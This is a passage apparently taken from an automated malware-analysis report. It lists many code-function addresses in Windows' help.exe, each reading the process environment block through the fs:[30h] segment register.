Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038453CA mov eax, dword ptr fs:[00000030h]	2_2_038453CA
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038453CA mov eax, dword ptr fs:[00000030h]	2_2_038453CA
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FE730 mov eax, dword ptr fs:[00000030h]	2_2_037FE730
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C4F2E mov eax, dword ptr fs:[00000030h]	2_2_037C4F2E
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C4F2E mov eax, dword ptr fs:[00000030h]	2_2_037C4F2E
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EF716 mov eax, dword ptr fs:[00000030h]	2_2_037EF716
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FA70E mov eax, dword ptr fs:[00000030h]	2_2_037FA70E
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FA70E mov eax, dword ptr fs:[00000030h]	2_2_037FA70E
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038037F5 mov eax, dword ptr fs:[00000030h]	2_2_038037F5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0389070D mov eax, dword ptr fs:[00000030h]	2_2_0389070D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0389070D mov eax, dword ptr fs:[00000030h]	2_2_0389070D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388131B mov eax, dword ptr fs:[00000030h]	2_2_0388131B
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385FF10 mov eax, dword ptr fs:[00000030h]	2_2_0385FF10
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385FF10 mov eax, dword ptr fs:[00000030h]	2_2_0385FF10
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EDBE9 mov eax, dword ptr fs:[00000030h]	2_2_037EDBE9
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F03E2 mov eax, dword ptr fs:[00000030h]	2_2_037F03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F03E2 mov eax, dword ptr fs:[00000030h]	2_2_037F03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F03E2 mov eax, dword ptr fs:[00000030h]	2_2_037F03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F03E2 mov eax, dword ptr fs:[00000030h]	2_2_037F03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F03E2 mov eax, dword ptr fs:[00000030h]	2_2_037F03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F03E2 mov eax, dword ptr fs:[00000030h]	2_2_037F03E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03898B58 mov eax, dword ptr fs:[00000030h]	2_2_03898B58
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F4BAD mov eax, dword ptr fs:[00000030h]	2_2_037F4BAD
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F4BAD mov eax, dword ptr fs:[00000030h]	2_2_037F4BAD
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F4BAD mov eax, dword ptr fs:[00000030h]	2_2_037F4BAD
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03898F6A mov eax, dword ptr fs:[00000030h]	2_2_03898F6A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F2397 mov eax, dword ptr fs:[00000030h]	2_2_037F2397
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D8794 mov eax, dword ptr fs:[00000030h]	2_2_037D8794
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FB390 mov eax, dword ptr fs:[00000030h]	2_2_037FB390
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D1B8F mov eax, dword ptr fs:[00000030h]	2_2_037D1B8F
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D1B8F mov eax, dword ptr fs:[00000030h]	2_2_037D1B8F
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385FE87 mov eax, dword ptr fs:[00000030h]	2_2_0385FE87
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]	2_2_037EAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]	2_2_037EAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]	2_2_037EAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]	2_2_037EAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EAE73 mov eax, dword ptr fs:[00000030h]	2_2_037EAE73
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D766D mov eax, dword ptr fs:[00000030h]	2_2_037D766D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038446A7 mov eax, dword ptr fs:[00000030h]	2_2_038446A7
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03890EA5 mov eax, dword ptr fs:[00000030h]	2_2_03890EA5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03890EA5 mov eax, dword ptr fs:[00000030h]	2_2_03890EA5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03890EA5 mov eax, dword ptr fs:[00000030h]	2_2_03890EA5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C9240 mov eax, dword ptr fs:[00000030h]	2_2_037C9240
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C9240 mov eax, dword ptr fs:[00000030h]	2_2_037C9240
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C9240 mov eax, dword ptr fs:[00000030h]	2_2_037C9240
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C9240 mov eax, dword ptr fs:[00000030h]	2_2_037C9240
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]	2_2_037D7E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]	2_2_037D7E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]	2_2_037D7E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]	2_2_037D7E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]	2_2_037D7E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D7E41 mov eax, dword ptr fs:[00000030h]	2_2_037D7E41
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0387FEC0 mov eax, dword ptr fs:[00000030h]	2_2_0387FEC0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03808EC7 mov eax, dword ptr fs:[00000030h]	2_2_03808EC7
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CE620 mov eax, dword ptr fs:[00000030h]	2_2_037CE620
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03898ED6 mov eax, dword ptr fs:[00000030h]	2_2_03898ED6
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E3A1C mov eax, dword ptr fs:[00000030h]	2_2_037E3A1C
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FA61C mov eax, dword ptr fs:[00000030h]	2_2_037FA61C
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FA61C mov eax, dword ptr fs:[00000030h]	2_2_037FA61C
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CAA16 mov eax, dword ptr fs:[00000030h]	2_2_037CAA16
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CAA16 mov eax, dword ptr fs:[00000030h]	2_2_037CAA16
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C5210 mov eax, dword ptr fs:[00000030h]	2_2_037C5210
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C5210 mov ecx, dword ptr fs:[00000030h]	2_2_037C5210
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C5210 mov eax, dword ptr fs:[00000030h]	2_2_037C5210
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C5210 mov eax, dword ptr fs:[00000030h]	2_2_037C5210
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D8A0A mov eax, dword ptr fs:[00000030h]	2_2_037D8A0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CC600 mov eax, dword ptr fs:[00000030h]	2_2_037CC600
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CC600 mov eax, dword ptr fs:[00000030h]	2_2_037CC600
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CC600 mov eax, dword ptr fs:[00000030h]	2_2_037CC600
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F8E00 mov eax, dword ptr fs:[00000030h]	2_2_037F8E00
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881608 mov eax, dword ptr fs:[00000030h]	2_2_03881608
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F2AE4 mov eax, dword ptr fs:[00000030h]	2_2_037F2AE4
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F16E0 mov ecx, dword ptr fs:[00000030h]	2_2_037F16E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D76E2 mov eax, dword ptr fs:[00000030h]	2_2_037D76E2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03804A2C mov eax, dword ptr fs:[00000030h]	2_2_03804A2C
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03804A2C mov eax, dword ptr fs:[00000030h]	2_2_03804A2C
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F36CC mov eax, dword ptr fs:[00000030h]	2_2_037F36CC
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F2ACB mov eax, dword ptr fs:[00000030h]	2_2_037F2ACB
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0387FE3F mov eax, dword ptr fs:[00000030h]	2_2_0387FE3F
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388AE44 mov eax, dword ptr fs:[00000030h]	2_2_0388AE44
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388AE44 mov eax, dword ptr fs:[00000030h]	2_2_0388AE44
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DAAB0 mov eax, dword ptr fs:[00000030h]	2_2_037DAAB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DAAB0 mov eax, dword ptr fs:[00000030h]	2_2_037DAAB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FFAB0 mov eax, dword ptr fs:[00000030h]	2_2_037FFAB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03854257 mov eax, dword ptr fs:[00000030h]	2_2_03854257
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]	2_2_037C52A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]	2_2_037C52A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]	2_2_037C52A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]	2_2_037C52A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C52A5 mov eax, dword ptr fs:[00000030h]	2_2_037C52A5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388EA55 mov eax, dword ptr fs:[00000030h]	2_2_0388EA55
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0387B260 mov eax, dword ptr fs:[00000030h]	2_2_0387B260
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0387B260 mov eax, dword ptr fs:[00000030h]	2_2_0387B260
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FD294 mov eax, dword ptr fs:[00000030h]	2_2_037FD294
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FD294 mov eax, dword ptr fs:[00000030h]	2_2_037FD294
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03898A62 mov eax, dword ptr fs:[00000030h]	2_2_03898A62
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0380927A mov eax, dword ptr fs:[00000030h]	2_2_0380927A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EC577 mov eax, dword ptr fs:[00000030h]	2_2_037EC577
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EC577 mov eax, dword ptr fs:[00000030h]	2_2_037EC577
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CB171 mov eax, dword ptr fs:[00000030h]	2_2_037CB171
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CB171 mov eax, dword ptr fs:[00000030h]	2_2_037CB171
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CC962 mov eax, dword ptr fs:[00000030h]	2_2_037CC962
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038469A6 mov eax, dword ptr fs:[00000030h]	2_2_038469A6
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038905AC mov eax, dword ptr fs:[00000030h]	2_2_038905AC
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038905AC mov eax, dword ptr fs:[00000030h]	2_2_038905AC
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E7D50 mov eax, dword ptr fs:[00000030h]	2_2_037E7D50
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EB944 mov eax, dword ptr fs:[00000030h]	2_2_037EB944
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EB944 mov eax, dword ptr fs:[00000030h]	2_2_037EB944
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038451BE mov eax, dword ptr fs:[00000030h]	2_2_038451BE
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038451BE mov eax, dword ptr fs:[00000030h]	2_2_038451BE
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038451BE mov eax, dword ptr fs:[00000030h]	2_2_038451BE
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038451BE mov eax, dword ptr fs:[00000030h]	2_2_038451BE
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F4D3B mov eax, dword ptr fs:[00000030h]	2_2_037F4D3B
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F4D3B mov eax, dword ptr fs:[00000030h]	2_2_037F4D3B
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F4D3B mov eax, dword ptr fs:[00000030h]	2_2_037F4D3B
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F513A mov eax, dword ptr fs:[00000030h]	2_2_037F513A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F513A mov eax, dword ptr fs:[00000030h]	2_2_037F513A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037D3D34 mov eax, dword ptr fs:[00000030h]	2_2_037D3D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CAD30 mov eax, dword ptr fs:[00000030h]	2_2_037CAD30
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]	2_2_03846DC9
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]	2_2_03846DC9
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]	2_2_03846DC9
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846DC9 mov ecx, dword ptr fs:[00000030h]	2_2_03846DC9
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]	2_2_03846DC9
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846DC9 mov eax, dword ptr fs:[00000030h]	2_2_03846DC9
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E4120 mov eax, dword ptr fs:[00000030h]	2_2_037E4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E4120 mov eax, dword ptr fs:[00000030h]	2_2_037E4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E4120 mov eax, dword ptr fs:[00000030h]	2_2_037E4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E4120 mov eax, dword ptr fs:[00000030h]	2_2_037E4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E4120 mov ecx, dword ptr fs:[00000030h]	2_2_037E4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0388FDE2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0388FDE2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0388FDE2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0388FDE2
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038541E8 mov eax, dword ptr fs:[00000030h]	2_2_038541E8
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03878DF1 mov eax, dword ptr fs:[00000030h]	2_2_03878DF1
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C9100 mov eax, dword ptr fs:[00000030h]	2_2_037C9100
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C9100 mov eax, dword ptr fs:[00000030h]	2_2_037C9100
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C9100 mov eax, dword ptr fs:[00000030h]	2_2_037C9100
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CB1E1 mov eax, dword ptr fs:[00000030h]	2_2_037CB1E1
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CB1E1 mov eax, dword ptr fs:[00000030h]	2_2_037CB1E1
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037CB1E1 mov eax, dword ptr fs:[00000030h]	2_2_037CB1E1
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DD5E0 mov eax, dword ptr fs:[00000030h]	2_2_037DD5E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DD5E0 mov eax, dword ptr fs:[00000030h]	2_2_037DD5E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0388E539 mov eax, dword ptr fs:[00000030h]	2_2_0388E539
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0384A537 mov eax, dword ptr fs:[00000030h]	2_2_0384A537
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03898D34 mov eax, dword ptr fs:[00000030h]	2_2_03898D34
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03803D43 mov eax, dword ptr fs:[00000030h]	2_2_03803D43
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03843540 mov eax, dword ptr fs:[00000030h]	2_2_03843540
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F1DB5 mov eax, dword ptr fs:[00000030h]	2_2_037F1DB5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F1DB5 mov eax, dword ptr fs:[00000030h]	2_2_037F1DB5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F1DB5 mov eax, dword ptr fs:[00000030h]	2_2_037F1DB5
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F35A1 mov eax, dword ptr fs:[00000030h]	2_2_037F35A1
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F61A0 mov eax, dword ptr fs:[00000030h]	2_2_037F61A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F61A0 mov eax, dword ptr fs:[00000030h]	2_2_037F61A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FFD9B mov eax, dword ptr fs:[00000030h]	2_2_037FFD9B
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FFD9B mov eax, dword ptr fs:[00000030h]	2_2_037FFD9B
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F2990 mov eax, dword ptr fs:[00000030h]	2_2_037F2990
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]	2_2_037C2D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]	2_2_037C2D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]	2_2_037C2D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]	2_2_037C2D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037C2D8A mov eax, dword ptr fs:[00000030h]	2_2_037C2D8A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FA185 mov eax, dword ptr fs:[00000030h]	2_2_037FA185
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037EC182 mov eax, dword ptr fs:[00000030h]	2_2_037EC182
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F2581 mov eax, dword ptr fs:[00000030h]	2_2_037F2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F2581 mov eax, dword ptr fs:[00000030h]	2_2_037F2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F2581 mov eax, dword ptr fs:[00000030h]	2_2_037F2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F2581 mov eax, dword ptr fs:[00000030h]	2_2_037F2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03843884 mov eax, dword ptr fs:[00000030h]	2_2_03843884
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03843884 mov eax, dword ptr fs:[00000030h]	2_2_03843884
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E746D mov eax, dword ptr fs:[00000030h]	2_2_037E746D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E0050 mov eax, dword ptr fs:[00000030h]	2_2_037E0050
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037E0050 mov eax, dword ptr fs:[00000030h]	2_2_037E0050
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038090AF mov eax, dword ptr fs:[00000030h]	2_2_038090AF
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FA44B mov eax, dword ptr fs:[00000030h]	2_2_037FA44B
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]	2_2_037F002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]	2_2_037F002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]	2_2_037F002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]	2_2_037F002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037F002D mov eax, dword ptr fs:[00000030h]	2_2_037F002D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037FBC2C mov eax, dword ptr fs:[00000030h]	2_2_037FBC2C
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]	2_2_0385B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385B8D0 mov ecx, dword ptr fs:[00000030h]	2_2_0385B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]	2_2_0385B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]	2_2_0385B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]	2_2_0385B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0385B8D0 mov eax, dword ptr fs:[00000030h]	2_2_0385B8D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DB02A mov eax, dword ptr fs:[00000030h]	2_2_037DB02A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DB02A mov eax, dword ptr fs:[00000030h]	2_2_037DB02A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DB02A mov eax, dword ptr fs:[00000030h]	2_2_037DB02A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_037DB02A mov eax, dword ptr fs:[00000030h]	2_2_037DB02A
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03898CD6 mov eax, dword ptr fs:[00000030h]	2_2_03898CD6
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_038814FB mov eax, dword ptr fs:[00000030h]	2_2_038814FB
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846CF0 mov eax, dword ptr fs:[00000030h]	2_2_03846CF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846CF0 mov eax, dword ptr fs:[00000030h]	2_2_03846CF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03846CF0 mov eax, dword ptr fs:[00000030h]	2_2_03846CF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0389740D mov eax, dword ptr fs:[00000030h]	2_2_0389740D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0389740D mov eax, dword ptr fs:[00000030h]	2_2_0389740D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_0389740D mov eax, dword ptr fs:[00000030h]	2_2_0389740D
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
Source: C:\Windows\SysWOW64\help.exe	Code function: 2_2_03881C06 mov eax, dword ptr fs:[00000030h]	2_2_03881C06
